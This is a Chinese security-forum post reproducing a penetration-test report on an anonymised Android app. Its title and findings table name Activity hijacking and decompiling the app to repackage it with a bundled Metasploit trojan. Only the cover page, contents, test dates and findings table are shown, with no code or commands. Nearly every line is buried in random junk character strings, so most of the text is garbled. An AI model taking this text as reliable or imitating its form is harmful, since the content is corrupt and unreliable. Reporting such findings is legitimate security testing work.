找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
返回列表 发新帖
查看: 5379|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
0 I. v* f; l' d2 b5 g* z' U8 R' x 4 Q* f u1 a, W( K0 K- f* j }

+ h- u, s% z- d5 Z1 [" t; n7 Q+ ?" o+ F! J# [( a& p) C4 r- V) z' ^! S2 S
/ [* }6 D" C( {" r, r & E Z8 ?5 ~" D/ @

& W3 b6 S( ]! L 8 \6 t: w; D) h. G% F9 I9 T S8 p) b8 h
. a: Q+ N8 j3 s. w8 g# K 6 G) L% o4 d. {# E6 u. _

" h4 O1 k% l% W $ U" C. ^/ h3 \- M 文档编号:                2 N y" `$ H- S o" [* { ) A, }3 Z' z/ r" Z

8 j5 B/ i H' W z x4 ~ * N) Y1 X. L3 G3 {+ G- p6 [& G

^# {0 |+ N6 H& ~6 ]2 ]" j( P / J% G" D. @; m6 T   $ `, o4 {. [! |0 g$ X 7 w& t' e/ \, b4 x2 ^

( V3 U5 |; }6 v% K' J$ H5 \ ; k. F$ E) C' _/ ~1 I

& T( D* a0 O. H e* Q+ v$ J& F; t* }3 V2 e1 `. a   4 |3 [9 }- o. _* F8 V/ _+ j9 O ) z- n$ K3 x! R- r2 x+ O0 E! p

; C3 [2 T4 V+ l0 Z3 c $ z1 r4 Z+ Y. @ y/ h7 o& A# z

7 t4 b4 I6 y- N2 |* t/ J/ o4 k+ M: K   * p! _2 a' f9 [7 N% | 3 ?" ~# \' M a

3 v; e( L0 X8 `$ M% e ) K8 `8 x1 P* F1 ?& ~

3 z) q) I) J& U9 _8 e 1 l: A3 M I1 w# y' V4 V: l   ' W Q6 ~# Y" W2 c c! u 9 r1 A8 n1 j4 k

8 A; o* T/ C) i3 T# R% f: k 1 M$ V2 y" }6 H$ F4 V- s: I

" E; \, Y- R6 ?9 o7 i% S . q1 K e4 W' @3 W3 X9 {3 A2 d   - d: i, {& f# C$ Z 6 ~. Q3 r5 _7 P: l6 A' E, Y2 N

/ D! [( X+ L9 P" U0 I* c% h- c/ J1 D3 H2 w6 `

2 o& E2 z$ a7 N" k) S 6 q+ l6 \5 f6 J: _; n 某某某APP渗透测试 ' ~/ X: {% M( w 0 V! T8 g( m, y; N6 S

2 c3 p( |) c- ~$ u # f3 ?1 I: s+ v

5 W+ u: S# l4 q 2 U' ^& B1 e$ {* i   + Q3 H# Q' \3 x0 H) X4 h- [( W 3 K4 k6 S; ~5 l7 N

5 D) x" {% Q9 ~, V9 Z& {& J0 I1 f3 Y# t4 |

; y3 h( J6 c; h, w7 q: G ) g+ E( k! p' n! c) }   / _% Q9 F& Q/ m* }! l7 ~. g' S( ]/ d5 _1 q0 z

+ F3 W, x3 Z9 T; W 6 Q8 ~. W/ b7 U4 ]2 z

2 `9 K1 \# M4 q/ I4 o4 @ " J& g6 _! r" {! R3 ]   9 x# m7 Z& b- f: X1 A/ j1 z9 b E7 e/ _4 r3 K3 N

x9 Z! i6 k% [& [; [ 0 L8 r/ N# l* _5 e# S

& `/ |1 b2 |( b+ C, X! j/ m+ D4 d A   ' a0 ^; \: v |' U/ F# [* x p) C* n5 W, h) {( B2 ]

3 g" j3 Y f1 G: F 2 Q' E' \0 P- n9 [. ]& G2 N

. ]) L/ I+ C4 @1 Z! } ) ^# N3 o6 v0 Y* q 技 术 报 告 ' p: v; U6 ?+ J6 m: [ " v- J/ X: P' Q- B1 B* {

% V4 M: n! {. ]5 N* N' A! g% a U; t1 g- C+ n9 T. s& F

( s" s2 j; h# H: C+ u # x5 B/ \" }3 [1 Z5 ^1 N   N3 b+ x/ M+ y ` 6 K; U, a/ p: G& g4 w8 V

; t+ F5 p. o. i3 w% f4 N# ] 8 j5 c/ D4 D4 H6 R4 x+ W; @* |

/ I' D2 C+ n+ D0 b8 S. b ! e. C* C, w! K& ?; h   " T& g1 ?/ ^; g) m0 K/ {: d! {( h7 `# b; ^( P) [! J+ d

' V7 o# e6 S1 j( ]# ] ! i$ O0 Z6 g4 f7 p5 B1 a

0 f! L B4 ^2 w( m* j: t O3 v 5 B B4 z5 N) \2 K7 U, ~, a   0 [& C1 E2 G3 G! K + t( D1 S0 X7 l: M4 S- C' [

' U9 _: q' k0 H% s! F 5 x0 N* X$ M/ z6 l

7 J. T; G! @8 D% N' i" d" p; [4 B9 x) _) Q8 s0 A o" J5 k% d   3 X+ l$ T* M8 C5 C! T8 w$ `& ?9 |+ Z% P+ b; D4 N- }5 z

) ~* {( ^* ?# y1 H , u1 x2 Q5 [: Q [2 e

& c( D* a$ F A2 x9 Y" o0 ?/ w0 u/ Y8 ^: P+ U2 V: A/ Y   $ T E( U& o9 U& {/ g9 v9 b( b) @- r+ z

- _. k% X7 U _4 a3 F + |' _. N! ~& B) _ z+ B

& Q! f/ O7 K3 k% o" O h( {7 U9 R& k @9 ^! o   ; D+ I8 g" J; i/ I" L $ x! S$ x/ ]9 i: a

# C5 W G- [0 i' s9 h) A6 t! n& R+ {# V# c8 w# X& z

- a/ v) c; Z$ q* i / K' @! W( _& U   4 v9 `4 s% f& i- d4 V. C / H/ q+ K& X. e

4 H I B* |( @$ [, R. h 3 q! f7 \7 u; n2 S6 E* [; x& [

& h- J! X- l# l3 u( q& y. [' O2 ] " A# e, F* ~2 }( x   9 v3 Q! p" |8 A+ s6 T5 H5 M5 P, Q% B$ G) m* X

( q2 h y* j% m: J2 Q$ _& S# { w3 r! H* S

* y2 u# P7 f& h, a" ]. _' O ; f X8 e. E& V1 G/ d   % t8 s( r' f; V- G+ i 8 W2 C+ G9 D* \8 B! Q/ l; k

; U. W) m8 d0 F( W/ P3 I7 s) ~ , C& r( ~/ H5 x5 H7 e

/ r4 }" b8 g% x9 |! H9 ` 2 g6 l% M" r% M G' W e- z   ( j' w2 A3 l) N8 X% b6 {) v- x4 v6 |1 J& R9 q

6 { ]' n* Y* m" r- [& O T% a4 g5 Z' W% d6 l* E H

! d2 B0 V% f4 K3 ~( w% Z* ~ : p7 U, C2 B& [- K9 j   $ Z, \* x, j" [' M ' I1 o( r k% {* m

( g3 `5 c! C* l 2 R8 a ?0 }' G4 U/ A, O) I! ^

/ {# A" d1 n/ B' M 7 O. Y& J3 O! s* y8 H   / N' }) R D$ m5 q& q" i: ^5 i+ q) n. J! I: s, @

' q+ T* G; Z6 u8 L4 G: s 8 ^# M1 K4 C7 H$ p

* u0 V" {: m5 e8 u2 n- b) T ! f7 E) H1 W5 ~$ O3 Q6 s/ v1 X* [   9 a! P- q" Q6 ?6 g; z3 ? : Y# O* r1 a1 L/ ?+ N& q" a! D

/ A$ E2 G: k1 ?8 g" e6 t7 f4 m: Z% i* p

( u u5 R( r4 G9 B. M- w4 V& v ~2 {. R/ A   ' @( t0 b# i" S8 w9 R: Z0 @( n3 v6 K* J( J1 V/ q5 p$ E

7 Y8 W: u+ C: j- h/ S) T2 k( l; K) _# C' [) J' a' @! K

5 c, }" i7 V5 ]7 m) \% n( H7 e 7 h& G4 }( P7 {* u+ K) a   $ `' T2 n0 V- z4 K 2 E- `% m0 f+ o: [/ H3 Z& k0 Y

9 b$ G8 G p! J& O1 J' a2 D. Y1 O$ q1 h7 N$ U a5 s' i4 _ C% R

; ]8 B | G' p5 G! p$ e' ?3 p+ S) r   . ?8 D. y, ~: L5 S( V 5 X" C( E# `1 t3 d% X9 H, U

8 C, L( s7 n d: S# U2 z( ]1 F' ` - l/ a2 n" B# i* `$ t' d; Y

2 z. X3 ^+ T. u! X# f% g3 ?$ F / G8 X( U- b! b7 J& Z/ E   - U. U: t. X/ Y$ V% B 1 s& N9 J( u: b5 {- P% _

" n! B0 ~ }- ~; @7 R) a: f5 M1 E" g" W0 w6 C

' @5 r% v3 ~2 Q: u/ J+ c5 d 4 ?2 Z+ J- {8 N- ]   $ r# o2 }2 V5 F - O: d( P [$ U, h9 F! e

5 ~3 c6 E% u; C 8 I9 ?7 f' m$ b; \' V0 y

" \4 I2 q5 L! e) } 2 z$ Y* x# y7 \8 i& P: L5 ?6 K7 N 二〇二〇年 9 h4 @; a1 F, e , L: ?7 F. z* ]* p+ T; k7 q

: w* P' z: M8 e+ O. M/ U( g 3 r1 |/ u% J/ k9 A
1 z# X: o0 y) ]( t( w* i. T - z: h( x- ^. D8 X/ }2 O b
/ P2 H. ]3 W3 ^* ?% J6 G , j7 ?- Y/ ^! ~2 M# L1 w- p 6 D: y9 `1 R5 C) y8 {: S; j1 @' h0 M& l3 A/ k( a
9 P2 g! I# ~% j, b1 N" W4 G5 j $ R1 ^0 l+ |# s# c+ i1 k
( D6 ^4 Z0 ]; K7 R( q! N% m / S7 N" p. j3 s0 x4 j l
8 p8 d* e+ P$ j8 X8 `7 n* h9 {( E' Y. Y / Z9 _' T9 ]9 x6 _ & [3 Z9 H+ A. b4 [2 x9 a: v9 {
+ o/ S6 {% M, c 1 l0 X: G. o: F3 c: i& \. H

@! @$ @, |1 Q1 T4 k( \ 7 T2 i0 ~# @9 y0 `. M% @- R3 p: F* W 目 录 " h1 Y6 ~9 w6 b " L# ]8 h+ Q! V5 l: f* B [

. ?* ~* w2 w/ H4 z8 F3 d 6 Y8 E5 H/ H+ _+ e3 F6 ^3 a; N5 E# G ( ^/ y$ \7 m) |1 f3 S 9 ~" W# r# O8 I6 [6 e" C

( {/ b9 K0 @9 R7 C: c * ^: G* C/ w8 ~$ r% T1 M4 P& i: k   - R4 [3 w2 d6 \& g $ { I+ R {4 j$ L# d$ r% D

- h! f9 z' i w, |: r 6 e6 x: P p& f6 p6 ]" m) o& ~% c

5 K1 N$ |' M2 V/ s$ U, O, @ 4 b$ N' d, V/ V+ R" U+ q/ J 1 概述... 3 1 ~6 C1 N+ T* C _ E 7 e7 Y( u% U8 q! W0 g1 Q+ A, k1 l

; I! [" F" q6 d: K* O $ G5 t' x% d, C5 C2 v

2 q- _$ B h9 k; Z8 V ; w( N X2 w% X5 d 1.2测试时间... 3 1 S6 a* p; j0 r+ S 3 z6 w6 {: ]( T; U. q

; X) M: M8 x+ ? n; _% O [" @; s

. x7 m& v; K7 L ( |4 N g0 `, j5 d$ y 1.3测试对象... 3 ) }/ d' O! g. K* ?# [, @- i. Y9 ]! ~# U4 E- r7 g3 x

1 M( q$ y: b: v* g& z/ z ( M$ X3 l0 v5 k( d8 }% q! ^0 c

+ d+ K/ K( |# {$ c% }( X: A" \ N% J- h. p 1.4测试结果... 3 # q8 a$ A# r) }6 Q6 \6 J# o1 Q # d0 s+ q4 b* A; X

+ N( U7 A6 n- ^8 V* ^ ( C8 f" |- V. S+ ^( h- G

4 i7 g5 I' u1 k/ x2 R! b3 d& d h6 c! ^% G' j5 i' i; q5 D9 Z. S3 J 2 检测结果... 4 ) a$ T! F$ y; d6 d $ v8 p; v z/ N

" P7 s; b" a7 P' s" O* J$ M" ^$ N2 d" f1 r- S1 h

3 g/ Z# b( Q/ P& `6 y# K4 U 2 l" ~$ f$ @7 n. d0 w, r 2.1 某某某... 4 ) P2 N& K! {; f+ Y % A3 F- ^ F: S1 G0 S8 n# U# ?

5 {5 N! w- x; d5 R& g 0 [" A, a5 ^( X \

/ h5 T+ `7 }* r* k) ?1 Q3 S2 W+ S 3 E# w0 p/ t1 O& Q: s! c3 Y 2.1.1检测目标... 4 % i) l) M! o2 Q: k3 @! Y9 W3 A) `* h5 S' G' E

+ L2 Q9 Z |* R7 F8 _ 4 m$ r- R3 y3 \6 H, g

% j9 k8 {: G7 b) T: x3 P 5 i6 R+ F4 [8 s" V# M2 f+ A 2.1.2检测结果... 4 ) H f& b% C% K5 E7 m9 E6 c/ m0 z0 _- r ?

. e5 n, ?$ f* M0 w" j! A; ], F M$ N: e. L/ K: m

; N6 K4 _7 S2 J/ ?1 R$ v+ g , ^+ S% O0 K( G! P/ J | 2.1.2.1. 4 0 k. U* [ E m+ ] $ y3 v* q5 }0 r% i5 J/ @

5 a' N1 V/ @* ~* }( ^- u. f1 ^ / M9 l V6 M) S9 T, g f$ B

/ `* ?: q4 Z" Z/ Y7 a1 _1 J( x1 T; y& H, D5 ^ 2.1.2.2. 6 $ j7 Q i) A9 P: j6 O % g6 b2 E( _% ]7 [

+ c$ {( S9 W- Y1 t0 k1 B2 S& N- C/ s4 [; e; j9 `; ^# W6 Y

8 X6 B" n4 j* J" t - \" [1 C1 x' R- S2 B, i$ S . e) U& G- ^( P! A 9 ~! t+ [7 g2 q# E3 P% r

! n4 S9 a. t$ I Y( d0 T ! _/ L" m! j7 [" ^# \) L& ^9 w; L* U7 e) j' F3 n* Z & W/ y* z# m% o) J
! \, d" t- }3 l5 [: d- Q6 B+ X 7 J' v8 X7 ~0 H5 `
1 }. w- q5 r7 e+ Z 1 p# w5 w. k6 Y; t5 n6 @! `, ^ # Z0 r% m0 i! @* g2 U 5 ~- O n& ]" c2 i

" r% o0 [ r' t4 v+ t " H, D: p, S1 j8 Z, U9 s; L1 { 1 概述 ! v# l+ Y+ | W7 y # Y( w2 P1 F9 s9 g

; E8 x7 j# e2 Y9 c7 o2 F 5 d t3 J, B& z5 x) B

9 A0 g3 i# Z* o ^- o, U. Q' W1 r1 f4 P" A 1.2测试时间 . ^6 m. f+ I# I 1 o- {, ~9 k4 e4 d7 J

6 c7 L, V. T( x4 m9 u9 Q- ^ , N) n0 V7 a: v; l ; z$ V9 b4 W5 F8 B5 Y5 [. N* L! q) D1 f7 n% D( U0 i1 u$ ]: ]! ?& u. P2 n6 Q, V5 n$ W! G+ }4 a( n1 ]1 h: d C7 h8 D5 l$ O6 F1 B( \6 I) P5 a# }$ q0 O- D, ~, P, b2 [/ e4 y- Q8 Y2 [; t2 I6 Z0 u. @" ]( v8 i+ _' ~ q7 I4 Q- @! \1 e2 y- F& D; h: E, _8 ?" j* H# b. f1 M. ~" \" c2 Z0 U. A; A" @1 F9 A- o }5 h+ r+ \+ N+ X, Z9 `! s; ^. d5 c' l3 e& x% {0 @! c6 F! e7 @2 j& m0 w! k& u7 |- ?; A8 a, b; c1 V/ ^0 g: V$ c/ \$ s% E1 N: k0 `7 S D% ]4 `( l# M, o7 F2 I. N6 |+ _& R! P% I. M. k8 g1 m6 ?5 \: d& G7 ~% y# M. e, S* s; N, `5 A, ?, [) T- S8 O/ W7 F0 `' g) X% }$ E0 J! U% R' h+ e! p: ^0 P6 D, U# l; `/ h0 d4 p7 @ i) x- y0 x( t8 ]. A7 h9 b+ z! a; q! C% p# K7 L, |* x- D; m9 {8 j5 @1 m
8 a- J+ A# I7 d 0 a! C; B& `7 |4 ]

/ L: r7 \4 y7 w% i* }& {; a( g: s6 m5 w! y 渗透测试时间 . _ Z$ @ j) D3 Q5 ~, z 0 U- |4 M* ?! L

P; X' r. e( U$ p" M7 q! K$ x - A1 _1 X+ n+ y- b5 K
& t5 E, R2 E @, x! y' y8 V' Q; i9 P; i

% c( ]% l. o$ N6 g1 J( n: |2 _; a 9 q. N( J2 l5 s3 h/ }. q 起始时间 0 _- |9 X: t: G9 u9 M/ X . a: N$ l/ C' d

( X6 F+ A- v0 ^/ A" o ! B( _% X, ~: p1 ?$ ^( \: m" [ 		5 X, ]. n: q1 G9 x/ H0 h, D 4 o" n: N& r, g& }6 V# X

; I; `9 b: N! F" {5 y- e# O $ S! ]5 s5 z. U' ^ 202046 3 g1 n; m; q3 o2 U# ~9 N O" ~) g4 P, J) F% H' J

]; p+ a, W2 G& o! K0 y9 v3 G # j; \- z, h! ^+ Y
# v t7 w+ Q9 J9 j! R1 P" d+ g 0 |4 q: u, V- P) {* E

2 e7 L) H+ X6 x4 U2 g7 G& o" n+ M% e7 I- G# h 结束时间 ' O9 h3 D* s$ J h$ o) w # |" f) h! Q- b' ^! Q) s% o

! d$ x8 r) g9 ^2 _7 g3 G0 j: N! ~5 T# f6 R* M) }+ X# l2 c 		1 P" a, a/ |9 f2 l& X7 Z 9 Y" P: ^6 q7 ~. i

# p5 i5 I @1 f# x/ v/ f % H8 p* _* X& G 202049 ( w8 k9 C( U6 v& a. c' G3 R8 t, I7 Y6 p; C% @, s! v9 J6 B8 d4 w9 h6 z

+ {1 ]1 M, T/ P$ A% \5 J * F- W' c' E/ O% w% A9 D: s
3 V* O$ U: M) p, C! P$ K7 i& C9 z9 a2 Q" K4 t

7 \1 m6 `- }7 O" X. Y% _" l7 k0 W! u4 m* u: D% ~ 1.3测试对象 ' D- L$ q9 B' F% f * Z( M' E: E1 H& K+ ]

3 M) S( L9 F; P5 E: | 8 u; i6 ?7 C& t/ I$ P

! ?" Y0 E+ G. {6 { [: Q. [# u # A( G- l+ m; T, h. |- y 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: * Y" y4 m, j5 w- n$ B3 n5 \" n; b& u( q# v/ Z; e9 W8 z$ z6 @

* M2 m& O# @- t7 o4 {3 {7 W 2 j8 D7 o+ M$ {) z" a3 _

- \( ~, {7 a9 f 5 {- C: b% q- x" |0 W9 V 1-1 检测对象 ; ?4 C" a/ ]4 X8 _ . r& \1 C3 P% R6 X f' A8 [

. T' k3 C+ j: Y, k) q1 T- v- n6 K9 Q1 W* F$ c3 Y( U 6 Q u5 H3 c' Y2 y |" u4 ?7 i) n5 w, n" q1 Z4 c5 G9 H- ]0 [' k( P* v4 Z1 P9 L" T. I8 T' b" z8 ?4 V- ^5 C4 H c( }' T$ j4 Z( ?5 f# G# q9 q4 j: A3 t- K: K3 b0 @9 E- W! J d7 S0 a! d& R x" k& r8 R5 a1 ~8 z4 ]; K: b! Q) b, u9 _ k1 ^$ v6 ]" G5 E4 } U/ u" v, q9 }+ W- ~6 d) I. P* u6 S2 E6 P2 {" K. D' F; Q5 ]( _/ \# `- \* U5 j7 s( C( [ { |( x8 v% @; g8 l2 M7 A3 b% i* G" a: X& p. ~+ x* x* u/ A6 \! h0 F8 \( I& P3 d" g; |+ V" s- g; u9 L: ~, n/ M2 V, q5 w$ X v1 c: |2 I; D# a" x2 m6 y# R. P& \3 g6 P9 E+ B$ V: S* \0 y. W# @0 W- \! U" G4 K2 C& I' j) f A1 {1 X; E: R; G0 U) p- p' S( Z4 B" A+ i% L1 @) y& k" h* c1 y$ j$ T( e k9 X/ p+ P0 D% Q \* D( Q/ y% e1 F7 L4 W9 |9 R1 A9 u+ j- ~% ?2 ^% }6 m( b/ S q9 i+ ~1 F) z4 s' J
6 D8 d4 M/ v( q) I0 q : H/ ~; m% B1 S; R* @# e" i/ `

, s2 f- E" i7 `& q( a7 s( X * E- U$ _5 u2 o 序号 9 U; ?3 O- ^) v% l! \. J4 b( [ ' h t) m% S- o6 \' V5 o

l4 R; A H. G9 } : s7 D; v. O& f: f 		5 t5 ~. I( M: H! [6 ~9 K0 Z' e. y% ]' ^ m% r( {/ \' h! L/ B

" r0 S h( _8 U5 Y* F 2 t' |) h2 c) {' B 测试对象 1 ]9 T* a9 `3 A8 [( q( H% S4 d ! ?5 w; k& L) a, M# [1 j' t0 }

* N3 D" T. ^2 T; m7 m% z$ g* z" V. \0 _$ h 		, D4 c* r! `+ G: `/ r& d) }8 {& @2 p: R- T ?; K/ f

; r& [9 y3 _0 q/ @6 h 0 j5 v# C5 |: f 测试地址 6 f$ o9 H1 U4 W m. Q4 U, W# s / U9 G$ X3 n* p. o5 Y/ l7 }1 i

! S8 @+ c) g$ X2 J7 ] ; `. B/ E% |$ v6 a1 P 		* [, b! ^0 k5 E * V4 M2 ]2 P5 G8 {, `# v

; W' P' G1 V9 k" J' b- k . N& T: @, L0 O0 @4 e+ N$ \3 D) F 安全漏洞 / C }: e* d) [ + l, ~1 V) A& F4 D! j! q

) h! S2 ^+ ~5 H6 c+ ]% {3 }/ a z' s) Q+ D7 j! ] k- s
2 v! i2 D6 J+ c0 C/ A5 w: V 5 D: r2 Z) I, k% S# U

* j1 I: t% h& i/ W5 @3 e& D0 L( i1 P; @9 B0 A% M 1 9 c4 B0 I( T! S2 y6 q) ?- v% W: R6 ]; D

; u, K" T, j b. e/ S' v 7 N( [+ ^* q1 E" j- ]4 D |9 s 		2 Z7 {* n9 {* m4 o " B# L' I1 v8 o6 o: A

& F- a! ~ U# X" n; ? 7 r5 |$ k5 R) c# J* z1 X 某某某安卓APP 9 B7 o8 }. [6 k7 v . d+ @7 d1 g0 r4 |& a- a# `2 r

) f$ O7 N! x3 v9 w! V. c 9 E1 k3 G' `5 a0 H& u 		4 L0 A: j7 }/ t. ]% e- Z! z3 R B- S3 v1 ^1 q

- L$ ]$ z% z) K1 K, L( _1 Z; r; `: c6 R$ a% y   9 g4 E, R" a5 O2 b! x5 c4 t2 m2 i2 h. @% u' {5 P+ Y

3 o" y- S' t2 y; |, j 2 {' w+ i) D" K) E/ m# q6 [0 l( _2 i. q 		8 |' g' Y# R4 k& t% `. R' s z: w5 }! d2 p

9 |! A3 F- M( h/ E+ F0 B' {2 o1 w : r# w+ w/ @8 v 2 7 A2 I* x! Z' S( [$ s6 H1 o( T 5 }' R7 i: H0 k2 w/ A

# y5 `8 [' e. U3 H 3 G' ^( l+ j5 {4 u5 R
2 j) `8 R/ Y& x D2 V. E 3 {. l! {$ V8 f: ]

0 n+ h$ v0 Q/ s' X3 {6 X5 K! V, s5 @; m# I 1.4测试结果 5 o: W# H8 q, E0 g& b$ |" F9 M4 c/ Z2 i/ L8 R1 f) u7 F

" f& J5 s/ s+ H( T5 i 6 d9 U* S% |1 a$ J8 W9 i

, W( m8 ]5 _7 P! m# K. S6 R1 T ! \1 I4 `5 `5 E- w" ^$ o- ?; J 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: V6 s/ ~0 }0 [5 t y) I& G' S' s7 h F

2 h7 b# I- g" p5 t5 R/ v/ x+ K& ^( V, O& }- A; F( ]9 e4 n

, Z- J: M5 R- L% q% @) \* \ ; |8 m9 M% Q- @* N# s1 R, s2 t, m   ' i5 \- J8 _3 N2 c0 j/ @; e" x* G. u% ~& V+ Y: ^, D

' K- Z$ i( X4 H6 M, Z( D ) k6 r5 y* f5 {) @; T5 L
+ }; ~0 q# J0 K# c+ [; U " ?1 O8 X& [; d, N8 c6 n& O 4 x2 u( E X) a+ {( t* d' t8 H8 N ~, ^8 U( E( ?# P6 t' l; g$ V: T, n d2 }# L+ [: l; E3 l: s& N4 P+ G% p% ^+ K, H! W; A% k/ l" J6 ^0 H) A7 O) G& G l/ ~3 h! R/ q& Q7 R$ u* o E$ K" ] |# [5 w4 p6 ?8 A5 m0 N, W3 `" r* r) }7 s6 F2 a. Y" n$ r4 j" C# u$ \. u! l' |" S5 N) r0 ^; F1 ?' m7 N- G) Q' x: U( j, C$ e! L4 Y5 _% y. O1 ~! M- Y. q& E- P( o8 E5 Y/ t: b0 E6 Z9 p6 k& a& O- w3 s# B9 I8 @& r/ |2 I6 Q% T, [! i+ b, L4 E9 c! _6 E1 ~& m% M/ B, v$ l" |! \9 U* ^" b5 Z7 E+ S- p0 w- h8 Q/ q4 b+ B. z1 v2 n. J. l0 M8 m6 L1 x9 q. @6 P) [' A! L. g' m& W4 @4 _) l R: T' _) a( f1 l( }8 e* ?( j, m8 K: m/ H5 m4 I# T' Y3 T9 G6 T3 S) r, c4 Z) V/ s" T _: ^- o4 x% M' U" R5 L0 M S- D2 K' g. V5 h' x- C+ y% P O, J7 h! @: d' Z/ m z; h' Q- I5 K8 g( P8 X; G" A0 a" L0 l( U X" Y/ U- e$ z9 D+ R1 t/ p% ]! X4 i F3 U0 Z- y, \2 B- x4 t1 h8 _+ o9 L+ U" Y7 E, Y4 P0 B8 I9 O S5 X6 e% U, l0 v5 F; C- G( w s2 [$ k/ D: C6 N, T9 F8 K! O/ M7 `5 b X% r: J. Q8 L* t& B" B+ H' F; g3 L! Y1 {: s1 g6 [) y O- N' P7 N. v" Z! _! r+ y- q, w& ]$ i7 h- h! {8 u9 x3 P6 r, Y2 D B9 W2 m( ~' T, q. F# l1 e+ C: `: J5 z y! r; {; Q# q( M8 l# D2 q4 h) O& z, j4 g5 J! j2 }
" `4 g) s" M; M3 a# b1 [; O- _, ?

4 r3 P4 Y% N+ L# F- \' }0 K & d. v7 O# b' Y7 w 序号 1 E/ Q' D6 W" \0 p ; ]* o" T% {9 A! M0 w

9 _( Z0 ^9 \, B0 S' K% {. O9 ^8 d E7 v# J c6 J: g 		. B$ x0 [( L5 `+ k- [! g2 D & Q. R% g+ a+ Y

; S8 ?( H+ K7 w3 ^ 0 A3 K: p) e* V" }" F: Z6 g 系统名称 * J: r% E: c. y# I $ a/ G7 t9 b1 [( |

* w9 h% V" y* Y% q2 G7 a) i6 e + o: t6 B1 D# e" W1 U7 N n) V- A 		( Z1 f* b) Z6 s1 M6 d+ _! A7 `; i/ ?. b; U U( Y( v

0 O6 s9 n8 m8 o4 v4 \! z4 B # B8 `" q3 X+ C% U+ l! S( v 漏洞名称 : x* E2 L: u* Z& t6 n' N9 Y: U# N; { # e1 F& {8 I9 F

( u& Q" i: X, t 9 x% }6 M, b5 g" P/ F+ f0 w 		" I3 [9 a/ s- ? W3 s/ j& n 4 R. s* m) m( R) Z

% M+ F4 @* T4 ^, s0 u0 }/ z1 K9 i9 f/ S/ P5 t6 t9 L8 \ 漏洞危害 ; X, D% I4 }& @4 ~9 G7 T2 S% j2 ] % ?2 ^" O8 \6 s. A

3 g' G* b* G; q d. k. T2 N' I6 |4 j; D+ X 		" ~7 v3 p: q# N' F 0 c: Q; {! p6 V8 x+ `7 ^' y

; `# _+ C/ d1 U: @ ; u: K4 S) T' x( k 修复结果 ~, e* K% t) b% Z4 d5 F4 W$ b % m+ r9 B/ |# E5 b( R

, Y) B& h- ?- s: y3 B3 X4 b$ R 5 o1 c/ ]3 c7 r1 p2 b( \
6 }8 x7 A: X* b6 }4 y 8 X) [7 d. K* E" M

( E1 n+ f# r1 ~- B - v0 G7 h# C/ L( O, |) s# n 1 3 a& R4 |0 R: ~ & ?) B: r1 ~7 u. X9 {

$ N$ b h& V" v, L! G- K, n6 U. C# ~6 C" P 		7 m: l+ e4 M6 W3 P5 O9 H, z; d5 f, U 0 ]4 S8 g" a3 S# l8 f1 J1 P

0 n8 h) e+ b2 | 4 M6 x" T+ X$ e& a7 u J 某某某某某某APP . ^% y4 C) `+ I/ n+ m7 e! G- _7 I, L* }; v# m! k

$ G: V9 H9 x+ y& c , ~% }" a6 v1 J" Y9 S 		: Q! h' W" D D1 a" D$ e Y6 C' [ a) J% N' j4 s- D5 Q

8 p$ K7 ^6 D7 g; E2 D1 [7 ? $ K3 S/ ^" G0 B+ d L- l Activity 劫持 * v! s+ N2 z# q: A) G$ m2 `' x# _% b, {# v: @9 S

: s) Q3 t) E4 J6 a W ]2 ^" v! B/ Y: m

8 J) r- ?/ [/ D) J5 k! e) }: j 4 K" Z/ b. x! l7 T   |8 u+ ]6 y+ Q A; y9 Q% G" t/ W ) G5 K% u u7 s

4 N+ h. [9 Q; O4 ^ * q$ ?" T0 `0 U 		1 [9 N M. {* ?) f: u1 E $ L' a r+ I7 I/ t

9 a% I% a! u6 y- w3 S + w3 U. S M0 b , D% J* M" F0 R/ s+ M9 |+ g1 C$ S8 u" S7 z

! d9 S6 d/ D! M2 G; R# P: I1 j/ V' f+ L1 r6 o( K 		9 ?0 N8 e, d% E; g: i& B! x3 y t + A T' @, D7 Y) j/ I4 L

6 P* x* ^. K l- E0 q; @7 \; m1 D * O! }0 E$ [- ?8 j. r   ' w( n1 E0 V% j& L6 Y$ t 1 q: |* A6 q6 C9 k! e+ y

0 H$ G# A- V1 Z& t* ^ 7 I9 I2 o/ g3 O' u
/ |$ @1 @9 k! _+ a0 h z8 y " X3 C3 U, j7 v# k7 P% p

; t1 e c. I" u1 M % m9 b! S4 Z' y" R 2 0 [' A1 i2 p' G7 k 2 X- v b) i1 R; X/ n

1 @6 ~/ M, n" o6 ~' | 5 H8 B) u/ E! }1 r3 q 		% Z" y* j r/ X% @' F9 s * Z! }4 T0 w8 m. \% t1 B, C4 ^. {

6 ]( o" R! F2 ? Q0 t+ p , I$ Z' w; G5 s; J 某某某某某某APP }5 S: N+ Z9 q% T9 B. E3 L2 {: ^ 6 N& b; `5 s0 s* C t- _/ e5 [

1 S& f+ ?" F, f; e& ^ K+ ]. m- t" b; M6 J! d @ 		$ a/ b4 |" X! J5 B* H# c8 e / t* I2 L+ v, C/ [- L

; P$ J. _: Z) `7 ^0 L d* l 8 V0 n H. k* J4 Z h8 Z/ g, i 反编译二次打包捆绑木马、篡改APP代码 & Q. F# z: Y% D2 x, k ( k9 e3 Y8 @& R8 Z: ^6 S7 L

; X/ l) B8 t" v( @! L! W* q 5 U# ]9 J6 ?& { 		" N* @' u5 q0 r3 y! S+ P* ^ 1 I+ {+ A2 z5 ]9 y5 K& r- J

$ e, N& V0 B, J4 o3 Q- \/ h5 ? & R9 ?9 V4 z* ]" D5 p( i0 h& i ' @ i) B* X, Z9 w. ~ i * D' \: [4 t& q# d ?) B7 V" r6 P

. f2 Q0 K- `3 G3 \1 R/ L + k8 v0 O" c0 g5 x! G 		9 |1 e8 Z3 V$ K& C/ o/ \" n o- F4 g; L% V3 {7 R: k7 f

2 i8 l& g9 v+ ~: [% J. y% P- Y, ^ 2 m, n/ y! _. m9 r$ H   2 d4 `! {2 l! g! W7 X8 s" m" ` : q$ `& p: j3 o, p6 [

1 ^9 D& r& |$ q' v, o, i8 K' _( ^2 C 3 T/ P9 ~+ m* [4 H# n5 \
) ?% @! Z/ v3 E0 S( K5 I- ~: s1 k. b" I) ? S0 h$ M0 K# d
